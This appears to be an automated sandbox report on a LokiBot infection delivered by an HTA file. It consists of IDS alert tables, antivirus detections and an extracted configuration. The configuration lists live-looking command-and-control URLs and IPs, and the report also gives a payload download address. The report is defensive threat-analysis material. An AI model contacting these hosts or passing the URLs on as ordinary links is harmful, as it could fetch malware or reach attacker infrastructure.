                2024-11-15T18:14:34.615993+010020243181Malware Command and Control Activity Detected192.168.2.54977194.156.177.9580TCP
                2024-11-15T18:14:35.751845+010020243181Malware Command and Control Activity Detected192.168.2.54977694.156.177.9580TCP
                2024-11-15T18:14:36.861902+010020243181Malware Command and Control Activity Detected192.168.2.54978594.156.177.9580TCP
                2024-11-15T18:14:37.995017+010020243181Malware Command and Control Activity Detected192.168.2.54979094.156.177.9580TCP
                2024-11-15T18:14:39.112509+010020243181Malware Command and Control Activity Detected192.168.2.54979594.156.177.9580TCP
                2024-11-15T18:14:40.262543+010020243181Malware Command and Control Activity Detected192.168.2.54980194.156.177.9580TCP
                2024-11-15T18:14:41.385022+010020243181Malware Command and Control Activity Detected192.168.2.54980794.156.177.9580TCP
                2024-11-15T18:14:42.507084+010020243181Malware Command and Control Activity Detected192.168.2.54981194.156.177.9580TCP
                2024-11-15T18:14:43.612001+010020243181Malware Command and Control Activity Detected192.168.2.54981594.156.177.9580TCP
                2024-11-15T18:14:44.789085+010020243181Malware Command and Control Activity Detected192.168.2.54982094.156.177.9580TCP
                2024-11-15T18:14:47.376347+010020243181Malware Command and Control Activity Detected192.168.2.54982794.156.177.9580TCP
                2024-11-15T18:14:48.529208+010020243181Malware Command and Control Activity Detected192.168.2.54983994.156.177.9580TCP
                2024-11-15T18:14:49.701579+010020243181Malware Command and Control Activity Detected192.168.2.54984594.156.177.9580TCP
                2024-11-15T18:14:50.823890+010020243181Malware Command and Control Activity Detected192.168.2.54985194.156.177.9580TCP
                2024-11-15T18:14:51.959024+010020243181Malware Command and Control Activity Detected192.168.2.54985694.156.177.9580TCP
                2024-11-15T18:14:53.063828+010020243181Malware Command and Control Activity Detected192.168.2.54986294.156.177.9580TCP
                2024-11-15T18:14:54.208036+010020243181Malware Command and Control Activity Detected192.168.2.54986994.156.177.9580TCP
                2024-11-15T18:14:55.402259+010020243181Malware Command and Control Activity Detected192.168.2.54987594.156.177.9580TCP
                2024-11-15T18:14:56.541320+010020243181Malware Command and Control Activity Detected192.168.2.54988094.156.177.9580TCP
                2024-11-15T18:14:57.675629+010020243181Malware Command and Control Activity Detected192.168.2.54988594.156.177.9580TCP
                2024-11-15T18:14:59.316568+010020243181Malware Command and Control Activity Detected192.168.2.54988994.156.177.9580TCP
                2024-11-15T18:15:00.437229+010020243181Malware Command and Control Activity Detected192.168.2.54989794.156.177.9580TCP
                2024-11-15T18:15:01.556689+010020243181Malware Command and Control Activity Detected192.168.2.54990194.156.177.9580TCP
                2024-11-15T18:15:02.676612+010020243181Malware Command and Control Activity Detected192.168.2.54990594.156.177.9580TCP
                2024-11-15T18:15:03.787032+010020243181Malware Command and Control Activity Detected192.168.2.54990994.156.177.9580TCP
                2024-11-15T18:15:04.910372+010020243181Malware Command and Control Activity Detected192.168.2.54991594.156.177.9580TCP
                2024-11-15T18:15:06.064903+010020243181Malware Command and Control Activity Detected192.168.2.54992094.156.177.9580TCP
                2024-11-15T18:15:07.206218+010020243181Malware Command and Control Activity Detected192.168.2.54992594.156.177.9580TCP
                2024-11-15T18:15:08.362963+010020243181Malware Command and Control Activity Detected192.168.2.54993194.156.177.9580TCP
                2024-11-15T18:15:09.478766+010020243181Malware Command and Control Activity Detected192.168.2.54993594.156.177.9580TCP
                2024-11-15T18:15:10.588289+010020243181Malware Command and Control Activity Detected192.168.2.54994194.156.177.9580TCP
                2024-11-15T18:15:11.699501+010020243181Malware Command and Control Activity Detected192.168.2.54994794.156.177.9580TCP
                2024-11-15T18:15:12.850507+010020243181Malware Command and Control Activity Detected192.168.2.54995294.156.177.9580TCP
                2024-11-15T18:15:13.986959+010020243181Malware Command and Control Activity Detected192.168.2.54995994.156.177.9580TCP
                2024-11-15T18:15:15.095886+010020243181Malware Command and Control Activity Detected192.168.2.54996594.156.177.9580TCP
                2024-11-15T18:15:16.190598+010020243181Malware Command and Control Activity Detected192.168.2.54997194.156.177.9580TCP
                2024-11-15T18:15:17.330232+010020243181Malware Command and Control Activity Detected192.168.2.54997694.156.177.9580TCP
                2024-11-15T18:15:18.444210+010020243181Malware Command and Control Activity Detected192.168.2.54998494.156.177.9580TCP
                2024-11-15T18:15:19.618198+010020243181Malware Command and Control Activity Detected192.168.2.54999194.156.177.9580TCP
                2024-11-15T18:15:20.778565+010020243181Malware Command and Control Activity Detected192.168.2.54999994.156.177.9580TCP
                2024-11-15T18:15:22.095646+010020243181Malware Command and Control Activity Detected192.168.2.55000694.156.177.9580TCP
                2024-11-15T18:15:23.204415+010020243181Malware Command and Control Activity Detected192.168.2.55001494.156.177.9580TCP
                2024-11-15T18:15:24.317698+010020243181Malware Command and Control Activity Detected192.168.2.55002294.156.177.9580TCP
                2024-11-15T18:15:26.042078+010020243181Malware Command and Control Activity Detected192.168.2.55002394.156.177.9580TCP
                2024-11-15T18:15:27.521568+010020243181Malware Command and Control Activity Detected192.168.2.55002494.156.177.9580TCP
                2024-11-15T18:15:28.641531+010020243181Malware Command and Control Activity Detected192.168.2.55002594.156.177.9580TCP
                2024-11-15T18:15:29.755022+010020243181Malware Command and Control Activity Detected192.168.2.55002694.156.177.9580TCP
                2024-11-15T18:15:30.895119+010020243181Malware Command and Control Activity Detected192.168.2.55002794.156.177.9580TCP
                2024-11-15T18:15:32.048760+010020243181Malware Command and Control Activity Detected192.168.2.55002894.156.177.9580TCP
                2024-11-15T18:15:33.168332+010020243181Malware Command and Control Activity Detected192.168.2.55002994.156.177.9580TCP
                2024-11-15T18:15:34.322493+010020243181Malware Command and Control Activity Detected192.168.2.55003094.156.177.9580TCP
                2024-11-15T18:15:35.461033+010020243181Malware Command and Control Activity Detected192.168.2.55003194.156.177.9580TCP
                2024-11-15T18:15:36.584405+010020243181Malware Command and Control Activity Detected192.168.2.55003294.156.177.9580TCP
                2024-11-15T18:15:37.681743+010020243181Malware Command and Control Activity Detected192.168.2.55003394.156.177.9580TCP
                2024-11-15T18:15:38.775422+010020243181Malware Command and Control Activity Detected192.168.2.55003494.156.177.9580TCP
                2024-11-15T18:15:39.883593+010020243181Malware Command and Control Activity Detected192.168.2.55003594.156.177.9580TCP
                2024-11-15T18:15:40.978031+010020243181Malware Command and Control Activity Detected192.168.2.55003694.156.177.9580TCP
                2024-11-15T18:15:42.128775+010020243181Malware Command and Control Activity Detected192.168.2.55003794.156.177.9580TCP
                2024-11-15T18:15:43.271865+010020243181Malware Command and Control Activity Detected192.168.2.55003894.156.177.9580TCP
                2024-11-15T18:15:44.406130+010020243181Malware Command and Control Activity Detected192.168.2.55003994.156.177.9580TCP
                2024-11-15T18:15:45.498060+010020243181Malware Command and Control Activity Detected192.168.2.55004094.156.177.9580TCP
                2024-11-15T18:15:46.635568+010020243181Malware Command and Control Activity Detected192.168.2.55004194.156.177.9580TCP
                2024-11-15T18:15:47.899602+010020243181Malware Command and Control Activity Detected192.168.2.55004294.156.177.9580TCP
                2024-11-15T18:15:49.008238+010020243181Malware Command and Control Activity Detected192.168.2.55004394.156.177.9580TCP
                2024-11-15T18:15:50.170092+010020243181Malware Command and Control Activity Detected192.168.2.55004494.156.177.9580TCP
                2024-11-15T18:15:52.304139+010020243181Malware Command and Control Activity Detected192.168.2.55004594.156.177.9580TCP
                2024-11-15T18:15:53.784154+010020243181Malware Command and Control Activity Detected192.168.2.55004694.156.177.9580TCP
                2024-11-15T18:15:54.916540+010020243181Malware Command and Control Activity Detected192.168.2.55004794.156.177.9580TCP
                2024-11-15T18:15:56.055649+010020243181Malware Command and Control Activity Detected192.168.2.55004894.156.177.9580TCP
                2024-11-15T18:15:57.189916+010020243181Malware Command and Control Activity Detected192.168.2.55004994.156.177.9580TCP
                2024-11-15T18:15:58.301640+010020243181Malware Command and Control Activity Detected192.168.2.55005094.156.177.9580TCP
                2024-11-15T18:15:59.440010+010020243181Malware Command and Control Activity Detected192.168.2.55005194.156.177.9580TCP
                2024-11-15T18:16:00.576896+010020243181Malware Command and Control Activity Detected192.168.2.55005294.156.177.9580TCP
                2024-11-15T18:16:01.676781+010020243181Malware Command and Control Activity Detected192.168.2.55005394.156.177.9580TCP
                2024-11-15T18:16:02.815850+010020243181Malware Command and Control Activity Detected192.168.2.55005494.156.177.9580TCP
                2024-11-15T18:16:04.169499+010020243181Malware Command and Control Activity Detected192.168.2.55005594.156.177.9580TCP
                2024-11-15T18:16:05.363656+010020243181Malware Command and Control Activity Detected192.168.2.55005694.156.177.9580TCP
                2024-11-15T18:16:06.517735+010020243181Malware Command and Control Activity Detected192.168.2.55005794.156.177.9580TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-15T18:14:31.426231+010020216411A Network Trojan was detected192.168.2.54976194.156.177.9580TCP
                2024-11-15T18:14:32.580658+010020216411A Network Trojan was detected192.168.2.54976694.156.177.9580TCP
                2024-11-15T18:14:33.648797+010020216411A Network Trojan was detected192.168.2.54977194.156.177.9580TCP
                2024-11-15T18:14:34.779935+010020216411A Network Trojan was detected192.168.2.54977694.156.177.9580TCP
                2024-11-15T18:14:35.927180+010020216411A Network Trojan was detected192.168.2.54978594.156.177.9580TCP
                2024-11-15T18:14:37.042044+010020216411A Network Trojan was detected192.168.2.54979094.156.177.9580TCP
                2024-11-15T18:14:38.155116+010020216411A Network Trojan was detected192.168.2.54979594.156.177.9580TCP
                2024-11-15T18:14:39.310499+010020216411A Network Trojan was detected192.168.2.54980194.156.177.9580TCP
                2024-11-15T18:14:40.418721+010020216411A Network Trojan was detected192.168.2.54980794.156.177.9580TCP
                2024-11-15T18:14:41.540423+010020216411A Network Trojan was detected192.168.2.54981194.156.177.9580TCP
                2024-11-15T18:14:42.666273+010020216411A Network Trojan was detected192.168.2.54981594.156.177.9580TCP
                2024-11-15T18:14:43.780827+010020216411A Network Trojan was detected192.168.2.54982094.156.177.9580TCP
                2024-11-15T18:14:44.948157+010020216411A Network Trojan was detected192.168.2.54982794.156.177.9580TCP
                2024-11-15T18:14:47.565744+010020216411A Network Trojan was detected192.168.2.54983994.156.177.9580TCP
                2024-11-15T18:14:48.732748+010020216411A Network Trojan was detected192.168.2.54984594.156.177.9580TCP
                2024-11-15T18:14:49.866643+010020216411A Network Trojan was detected192.168.2.54985194.156.177.9580TCP
                2024-11-15T18:14:51.015684+010020216411A Network Trojan was detected192.168.2.54985694.156.177.9580TCP
                2024-11-15T18:14:52.116189+010020216411A Network Trojan was detected192.168.2.54986294.156.177.9580TCP
                2024-11-15T18:14:53.231994+010020216411A Network Trojan was detected192.168.2.54986994.156.177.9580TCP
                2024-11-15T18:14:54.415833+010020216411A Network Trojan was detected192.168.2.54987594.156.177.9580TCP
                2024-11-15T18:14:55.567481+010020216411A Network Trojan was detected192.168.2.54988094.156.177.9580TCP
                2024-11-15T18:14:56.697888+010020216411A Network Trojan was detected192.168.2.54988594.156.177.9580TCP
                2024-11-15T18:14:57.888076+010020216411A Network Trojan was detected192.168.2.54988994.156.177.9580TCP
                2024-11-15T18:14:59.477956+010020216411A Network Trojan was detected192.168.2.54989794.156.177.9580TCP
                2024-11-15T18:15:00.622720+010020216411A Network Trojan was detected192.168.2.54990194.156.177.9580TCP
                2024-11-15T18:15:01.716470+010020216411A Network Trojan was detected192.168.2.54990594.156.177.9580TCP
                2024-11-15T18:15:02.843351+010020216411A Network Trojan was detected192.168.2.54990994.156.177.9580TCP
                2024-11-15T18:15:03.944044+010020216411A Network Trojan was detected192.168.2.54991594.156.177.9580TCP
                2024-11-15T18:15:05.079130+010020216411A Network Trojan was detected192.168.2.54992094.156.177.9580TCP
                2024-11-15T18:15:06.232263+010020216411A Network Trojan was detected192.168.2.54992594.156.177.9580TCP
                2024-11-15T18:15:07.371818+010020216411A Network Trojan was detected192.168.2.54993194.156.177.9580TCP
                2024-11-15T18:15:08.527825+010020216411A Network Trojan was detected192.168.2.54993594.156.177.9580TCP
                2024-11-15T18:15:09.646081+010020216411A Network Trojan was detected192.168.2.54994194.156.177.9580TCP
                2024-11-15T18:15:10.738508+010020216411A Network Trojan was detected192.168.2.54994794.156.177.9580TCP
                2024-11-15T18:15:11.909051+010020216411A Network Trojan was detected192.168.2.54995294.156.177.9580TCP
                2024-11-15T18:15:13.033207+010020216411A Network Trojan was detected192.168.2.54995994.156.177.9580TCP
                2024-11-15T18:15:14.143909+010020216411A Network Trojan was detected192.168.2.54996594.156.177.9580TCP
                2024-11-15T18:15:15.260992+010020216411A Network Trojan was detected192.168.2.54997194.156.177.9580TCP
                2024-11-15T18:15:16.354360+010020216411A Network Trojan was detected192.168.2.54997694.156.177.9580TCP
                2024-11-15T18:15:17.488009+010020216411A Network Trojan was detected192.168.2.54998494.156.177.9580TCP
                2024-11-15T18:15:18.648637+010020216411A Network Trojan was detected192.168.2.54999194.156.177.9580TCP
                2024-11-15T18:15:19.770914+010020216411A Network Trojan was detected192.168.2.54999994.156.177.9580TCP
                2024-11-15T18:15:21.183194+010020216411A Network Trojan was detected192.168.2.55000694.156.177.9580TCP
                2024-11-15T18:15:22.276771+010020216411A Network Trojan was detected192.168.2.55001494.156.177.9580TCP
                2024-11-15T18:15:23.386905+010020216411A Network Trojan was detected192.168.2.55002294.156.177.9580TCP
                2024-11-15T18:15:24.486068+010020216411A Network Trojan was detected192.168.2.55002394.156.177.9580TCP
                2024-11-15T18:15:26.198172+010020216411A Network Trojan was detected192.168.2.55002494.156.177.9580TCP
                2024-11-15T18:15:27.680897+010020216411A Network Trojan was detected192.168.2.55002594.156.177.9580TCP
                2024-11-15T18:15:28.793698+010020216411A Network Trojan was detected192.168.2.55002694.156.177.9580TCP
                2024-11-15T18:15:29.925408+010020216411A Network Trojan was detected192.168.2.55002794.156.177.9580TCP
                2024-11-15T18:15:31.052611+010020216411A Network Trojan was detected192.168.2.55002894.156.177.9580TCP
                2024-11-15T18:15:32.214108+010020216411A Network Trojan was detected192.168.2.55002994.156.177.9580TCP
                2024-11-15T18:15:33.332376+010020216411A Network Trojan was detected192.168.2.55003094.156.177.9580TCP
                2024-11-15T18:15:34.479837+010020216411A Network Trojan was detected192.168.2.55003194.156.177.9580TCP
                2024-11-15T18:15:35.618188+010020216411A Network Trojan was detected192.168.2.55003294.156.177.9580TCP
                2024-11-15T18:15:36.745165+010020216411A Network Trojan was detected192.168.2.55003394.156.177.9580TCP
                2024-11-15T18:15:37.835646+010020216411A Network Trojan was detected192.168.2.55003494.156.177.9580TCP
                2024-11-15T18:15:38.930011+010020216411A Network Trojan was detected192.168.2.55003594.156.177.9580TCP
                2024-11-15T18:15:40.041826+010020216411A Network Trojan was detected192.168.2.55003694.156.177.9580TCP
                2024-11-15T18:15:41.133212+010020216411A Network Trojan was detected192.168.2.55003794.156.177.9580TCP
                2024-11-15T18:15:42.287477+010020216411A Network Trojan was detected192.168.2.55003894.156.177.9580TCP
                2024-11-15T18:15:43.432085+010020216411A Network Trojan was detected192.168.2.55003994.156.177.9580TCP
                2024-11-15T18:15:44.558614+010020216411A Network Trojan was detected192.168.2.55004094.156.177.9580TCP
                2024-11-15T18:15:45.645313+010020216411A Network Trojan was detected192.168.2.55004194.156.177.9580TCP
                2024-11-15T18:15:46.938497+010020216411A Network Trojan was detected192.168.2.55004294.156.177.9580TCP
                2024-11-15T18:15:48.053000+010020216411A Network Trojan was detected192.168.2.55004394.156.177.9580TCP
                2024-11-15T18:15:49.198772+010020216411A Network Trojan was detected192.168.2.55004494.156.177.9580TCP
                2024-11-15T18:15:51.314217+010020216411A Network Trojan was detected192.168.2.55004594.156.177.9580TCP
                2024-11-15T18:15:52.472929+010020216411A Network Trojan was detected192.168.2.55004694.156.177.9580TCP
                2024-11-15T18:15:53.951386+010020216411A Network Trojan was detected192.168.2.55004794.156.177.9580TCP
                2024-11-15T18:15:55.077914+010020216411A Network Trojan was detected192.168.2.55004894.156.177.9580TCP
                2024-11-15T18:15:56.206763+010020216411A Network Trojan was detected192.168.2.55004994.156.177.9580TCP
                2024-11-15T18:15:57.353617+010020216411A Network Trojan was detected192.168.2.55005094.156.177.9580TCP
                2024-11-15T18:15:58.470891+010020216411A Network Trojan was detected192.168.2.55005194.156.177.9580TCP
                2024-11-15T18:15:59.601399+010020216411A Network Trojan was detected192.168.2.55005294.156.177.9580TCP
                2024-11-15T18:16:00.728619+010020216411A Network Trojan was detected192.168.2.55005394.156.177.9580TCP
                2024-11-15T18:16:01.834858+010020216411A Network Trojan was detected192.168.2.55005494.156.177.9580TCP
                2024-11-15T18:16:03.165663+010020216411A Network Trojan was detected192.168.2.55005594.156.177.9580TCP
                2024-11-15T18:16:04.337364+010020216411A Network Trojan was detected192.168.2.55005694.156.177.9580TCP
                2024-11-15T18:16:05.839274+010020216411A Network Trojan was detected192.168.2.55005794.156.177.9580TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-15T18:14:16.278435+010020490381A Network Trojan was detected142.215.209.78443192.168.2.549705TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-15T18:14:31.426231+010028257661Malware Command and Control Activity Detected192.168.2.54976194.156.177.9580TCP
                2024-11-15T18:14:32.580658+010028257661Malware Command and Control Activity Detected192.168.2.54976694.156.177.9580TCP
                2024-11-15T18:14:33.648797+010028257661Malware Command and Control Activity Detected192.168.2.54977194.156.177.9580TCP
                2024-11-15T18:14:34.779935+010028257661Malware Command and Control Activity Detected192.168.2.54977694.156.177.9580TCP
                2024-11-15T18:14:35.927180+010028257661Malware Command and Control Activity Detected192.168.2.54978594.156.177.9580TCP
                2024-11-15T18:14:37.042044+010028257661Malware Command and Control Activity Detected192.168.2.54979094.156.177.9580TCP
                2024-11-15T18:14:38.155116+010028257661Malware Command and Control Activity Detected192.168.2.54979594.156.177.9580TCP
                2024-11-15T18:14:39.310499+010028257661Malware Command and Control Activity Detected192.168.2.54980194.156.177.9580TCP
                2024-11-15T18:14:40.418721+010028257661Malware Command and Control Activity Detected192.168.2.54980794.156.177.9580TCP
                2024-11-15T18:14:41.540423+010028257661Malware Command and Control Activity Detected192.168.2.54981194.156.177.9580TCP
                2024-11-15T18:14:42.666273+010028257661Malware Command and Control Activity Detected192.168.2.54981594.156.177.9580TCP
                2024-11-15T18:14:43.780827+010028257661Malware Command and Control Activity Detected192.168.2.54982094.156.177.9580TCP
                2024-11-15T18:14:44.948157+010028257661Malware Command and Control Activity Detected192.168.2.54982794.156.177.9580TCP
                2024-11-15T18:14:47.565744+010028257661Malware Command and Control Activity Detected192.168.2.54983994.156.177.9580TCP
                2024-11-15T18:14:48.732748+010028257661Malware Command and Control Activity Detected192.168.2.54984594.156.177.9580TCP
                2024-11-15T18:14:49.866643+010028257661Malware Command and Control Activity Detected192.168.2.54985194.156.177.9580TCP
                2024-11-15T18:14:51.015684+010028257661Malware Command and Control Activity Detected192.168.2.54985694.156.177.9580TCP
                2024-11-15T18:14:52.116189+010028257661Malware Command and Control Activity Detected192.168.2.54986294.156.177.9580TCP
                2024-11-15T18:14:53.231994+010028257661Malware Command and Control Activity Detected192.168.2.54986994.156.177.9580TCP
                2024-11-15T18:14:54.415833+010028257661Malware Command and Control Activity Detected192.168.2.54987594.156.177.9580TCP
                2024-11-15T18:14:55.567481+010028257661Malware Command and Control Activity Detected192.168.2.54988094.156.177.9580TCP
                2024-11-15T18:14:56.697888+010028257661Malware Command and Control Activity Detected192.168.2.54988594.156.177.9580TCP
                2024-11-15T18:14:57.888076+010028257661Malware Command and Control Activity Detected192.168.2.54988994.156.177.9580TCP
                2024-11-15T18:14:59.477956+010028257661Malware Command and Control Activity Detected192.168.2.54989794.156.177.9580TCP
                2024-11-15T18:15:00.622720+010028257661Malware Command and Control Activity Detected192.168.2.54990194.156.177.9580TCP
                2024-11-15T18:15:01.716470+010028257661Malware Command and Control Activity Detected192.168.2.54990594.156.177.9580TCP
                2024-11-15T18:15:02.843351+010028257661Malware Command and Control Activity Detected192.168.2.54990994.156.177.9580TCP
                2024-11-15T18:15:03.944044+010028257661Malware Command and Control Activity Detected192.168.2.54991594.156.177.9580TCP
                2024-11-15T18:15:05.079130+010028257661Malware Command and Control Activity Detected192.168.2.54992094.156.177.9580TCP
                2024-11-15T18:15:06.232263+010028257661Malware Command and Control Activity Detected192.168.2.54992594.156.177.9580TCP
                2024-11-15T18:15:07.371818+010028257661Malware Command and Control Activity Detected192.168.2.54993194.156.177.9580TCP
                2024-11-15T18:15:08.527825+010028257661Malware Command and Control Activity Detected192.168.2.54993594.156.177.9580TCP
                2024-11-15T18:15:09.646081+010028257661Malware Command and Control Activity Detected192.168.2.54994194.156.177.9580TCP
                2024-11-15T18:15:10.738508+010028257661Malware Command and Control Activity Detected192.168.2.54994794.156.177.9580TCP
                2024-11-15T18:15:11.909051+010028257661Malware Command and Control Activity Detected192.168.2.54995294.156.177.9580TCP
                2024-11-15T18:15:13.033207+010028257661Malware Command and Control Activity Detected192.168.2.54995994.156.177.9580TCP
                2024-11-15T18:15:14.143909+010028257661Malware Command and Control Activity Detected192.168.2.54996594.156.177.9580TCP
                2024-11-15T18:15:15.260992+010028257661Malware Command and Control Activity Detected192.168.2.54997194.156.177.9580TCP
                2024-11-15T18:15:16.354360+010028257661Malware Command and Control Activity Detected192.168.2.54997694.156.177.9580TCP
                2024-11-15T18:15:17.488009+010028257661Malware Command and Control Activity Detected192.168.2.54998494.156.177.9580TCP
                2024-11-15T18:15:18.648637+010028257661Malware Command and Control Activity Detected192.168.2.54999194.156.177.9580TCP
                2024-11-15T18:15:19.770914+010028257661Malware Command and Control Activity Detected192.168.2.54999994.156.177.9580TCP
                2024-11-15T18:15:21.183194+010028257661Malware Command and Control Activity Detected192.168.2.55000694.156.177.9580TCP
                2024-11-15T18:15:22.276771+010028257661Malware Command and Control Activity Detected192.168.2.55001494.156.177.9580TCP
                2024-11-15T18:15:23.386905+010028257661Malware Command and Control Activity Detected192.168.2.55002294.156.177.9580TCP
                2024-11-15T18:15:24.486068+010028257661Malware Command and Control Activity Detected192.168.2.55002394.156.177.9580TCP
                2024-11-15T18:15:26.198172+010028257661Malware Command and Control Activity Detected192.168.2.55002494.156.177.9580TCP
                2024-11-15T18:15:27.680897+010028257661Malware Command and Control Activity Detected192.168.2.55002594.156.177.9580TCP
                2024-11-15T18:15:28.793698+010028257661Malware Command and Control Activity Detected192.168.2.55002694.156.177.9580TCP
                2024-11-15T18:15:29.925408+010028257661Malware Command and Control Activity Detected192.168.2.55002794.156.177.9580TCP
                2024-11-15T18:15:31.052611+010028257661Malware Command and Control Activity Detected192.168.2.55002894.156.177.9580TCP
                2024-11-15T18:15:32.214108+010028257661Malware Command and Control Activity Detected192.168.2.55002994.156.177.9580TCP
                2024-11-15T18:15:33.332376+010028257661Malware Command and Control Activity Detected192.168.2.55003094.156.177.9580TCP
                2024-11-15T18:15:34.479837+010028257661Malware Command and Control Activity Detected192.168.2.55003194.156.177.9580TCP
                2024-11-15T18:15:35.618188+010028257661Malware Command and Control Activity Detected192.168.2.55003294.156.177.9580TCP
                2024-11-15T18:15:36.745165+010028257661Malware Command and Control Activity Detected192.168.2.55003394.156.177.9580TCP
                2024-11-15T18:15:37.835646+010028257661Malware Command and Control Activity Detected192.168.2.55003494.156.177.9580TCP
                2024-11-15T18:15:38.930011+010028257661Malware Command and Control Activity Detected192.168.2.55003594.156.177.9580TCP
                2024-11-15T18:15:40.041826+010028257661Malware Command and Control Activity Detected192.168.2.55003694.156.177.9580TCP
                2024-11-15T18:15:41.133212+010028257661Malware Command and Control Activity Detected192.168.2.55003794.156.177.9580TCP
                2024-11-15T18:15:42.287477+010028257661Malware Command and Control Activity Detected192.168.2.55003894.156.177.9580TCP
                2024-11-15T18:15:43.432085+010028257661Malware Command and Control Activity Detected192.168.2.55003994.156.177.9580TCP
                2024-11-15T18:15:44.558614+010028257661Malware Command and Control Activity Detected192.168.2.55004094.156.177.9580TCP
                2024-11-15T18:15:45.645313+010028257661Malware Command and Control Activity Detected192.168.2.55004194.156.177.9580TCP
                2024-11-15T18:15:46.938497+010028257661Malware Command and Control Activity Detected192.168.2.55004294.156.177.9580TCP
                2024-11-15T18:15:48.053000+010028257661Malware Command and Control Activity Detected192.168.2.55004394.156.177.9580TCP
                2024-11-15T18:15:49.198772+010028257661Malware Command and Control Activity Detected192.168.2.55004494.156.177.9580TCP
                2024-11-15T18:15:51.314217+010028257661Malware Command and Control Activity Detected192.168.2.55004594.156.177.9580TCP
                2024-11-15T18:15:52.472929+010028257661Malware Command and Control Activity Detected192.168.2.55004694.156.177.9580TCP
                2024-11-15T18:15:53.951386+010028257661Malware Command and Control Activity Detected192.168.2.55004794.156.177.9580TCP
                2024-11-15T18:15:55.077914+010028257661Malware Command and Control Activity Detected192.168.2.55004894.156.177.9580TCP
                2024-11-15T18:15:56.206763+010028257661Malware Command and Control Activity Detected192.168.2.55004994.156.177.9580TCP
                2024-11-15T18:15:57.353617+010028257661Malware Command and Control Activity Detected192.168.2.55005094.156.177.9580TCP
                2024-11-15T18:15:58.470891+010028257661Malware Command and Control Activity Detected192.168.2.55005194.156.177.9580TCP
                2024-11-15T18:15:59.601399+010028257661Malware Command and Control Activity Detected192.168.2.55005294.156.177.9580TCP
                2024-11-15T18:16:00.728619+010028257661Malware Command and Control Activity Detected192.168.2.55005394.156.177.9580TCP
                2024-11-15T18:16:01.834858+010028257661Malware Command and Control Activity Detected192.168.2.55005494.156.177.9580TCP
                2024-11-15T18:16:03.165663+010028257661Malware Command and Control Activity Detected192.168.2.55005594.156.177.9580TCP
                2024-11-15T18:16:04.337364+010028257661Malware Command and Control Activity Detected192.168.2.55005694.156.177.9580TCP
                2024-11-15T18:16:05.839274+010028257661Malware Command and Control Activity Detected192.168.2.55005794.156.177.9580TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-15T18:13:58.852111+010028582951A Network Trojan was detected192.3.243.13680192.168.2.549748TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-15T18:14:29.780577+010028587961A Network Trojan was detected192.168.2.549748192.3.243.13680TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-15T18:14:08.904488+010028587951A Network Trojan was detected192.168.2.549704192.3.243.13680TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: http://94.156.177.95/simple/five/fre.phpAvira URL Cloud: Label: malware
                Source: http://192.3.243.136/32/seemybestthingswithentirelifetimethingstodomybest.tIFAvira URL Cloud: Label: malware
                Source: 94.156.177.95/simple/five/fre.phpAvira URL Cloud: Label: malware
                Source: 00000009.00000002.2325175572.00000000065AF000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "94.156.177.95/simple/five/fre.php"]}
                Source: kissmegoodthingwhichgivemebestthignswithgirluaremy.htaReversingLabs: Detection: 21%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

                Phishing

                barindex
                Source: Yara matchFile source: kissmegoodthingwhichgivemebestthignswithgirluaremy.hta, type: SAMPLE
                Source: unknownHTTPS traffic detected: 142.215.209.78:443 -> 192.168.2.5:49705 version: TLS 1.2
                Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000009.00000002.2376307590.0000000006750000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2378358467.0000000006BCB000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2085425076.0000000007052000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2088188636.0000000007F98000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: aspnet_compiler.pdb source: 31437F.exe.11.dr
                Source: Binary string: $]q8C:\Users\user\AppData\Local\Temp\glmzcldr\glmzcldr.pdb source: powershell.exe, 00000001.00000002.2192931283.00000000053A0000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000009.00000002.2376307590.0000000006750000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2378358467.0000000006BCB000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000009.00000002.2378358467.0000000006BCB000.00000004.00000800.00020000.00000000.sdmp
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,11_2_00403D74

                Software Vulnerabilities

                barindex
                Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2858795 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M2 : 192.168.2.5:49704 -> 192.3.243.136:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49761 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49761 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49761 -> 94.156.177.95:80
